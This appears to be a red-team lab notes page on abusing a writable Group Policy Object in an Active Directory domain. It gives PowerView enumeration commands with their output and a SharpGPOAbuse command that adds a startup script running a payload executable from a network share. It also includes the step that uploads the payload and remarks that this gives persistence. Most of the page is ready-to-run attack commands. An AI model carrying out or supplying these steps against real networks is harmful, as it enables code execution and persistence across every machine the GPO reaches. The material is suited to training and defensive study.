Modify Existing GPO

Enumerate all GPOs in domain

Get-DomainSID

powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

AceType               : AccessAllowed
ObjectDN              : CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute
OpaqueLength          : 0
ObjectSID             : 
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-569305411-121244042-2357301523-1107
AccessMask            : 131127
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

Resolve GPO name and SID of the principal

powershell Get-DomainGPO -Identity "CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath

Vulnerable GPO \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}

powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

DEV\Developers

This shows us that members of the "Developers" group can modify "Vulnerable GPO"

Discover which OU(s) this GPO applies to

And by extension which computers are in those OUs

powershell Get-DomainOU -GPLink "{5059FAC1-5E94-4361-95D3-3BB235A23928}" | select distinguishedName

OU=Workstations,DC=dev,DC=cyberbotic,DC=io

Get the computers in an OU

powershell Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName

wkstn-1.dev.cyberbotic.io
wkstn-2.dev.cyberbotic.io

Modify the GPO (SharpGPOAbuse)

ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}

We will put a startup script in SYSVOL that will be executed each time an effected computer starts (which incidentally also acts as a good persistence mechanism).

SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"

Upload executable into share

cd \\dc-2\software\
upload C:\Payloads\dns_x64.exe

Check

powershell Find-DomainShare -CheckShareAccess

Test this by running 'gpupdate /force' on a device in the group and then rebooting it

Last updated 2 years ago

hashtagEnumerate all GPOs in domain

hashtagResolve GPO name and SID of the principal

hashtagDiscover which OU(s) this GPO applies to

hashtagGet the computers in an OU

hashtagModify the GPO (SharpGPOAbuse)

Enumerate all GPOs in domain

Resolve GPO name and SID of the principal

Discover which OU(s) this GPO applies to

Get the computers in an OU

Modify the GPO (SharpGPOAbuse)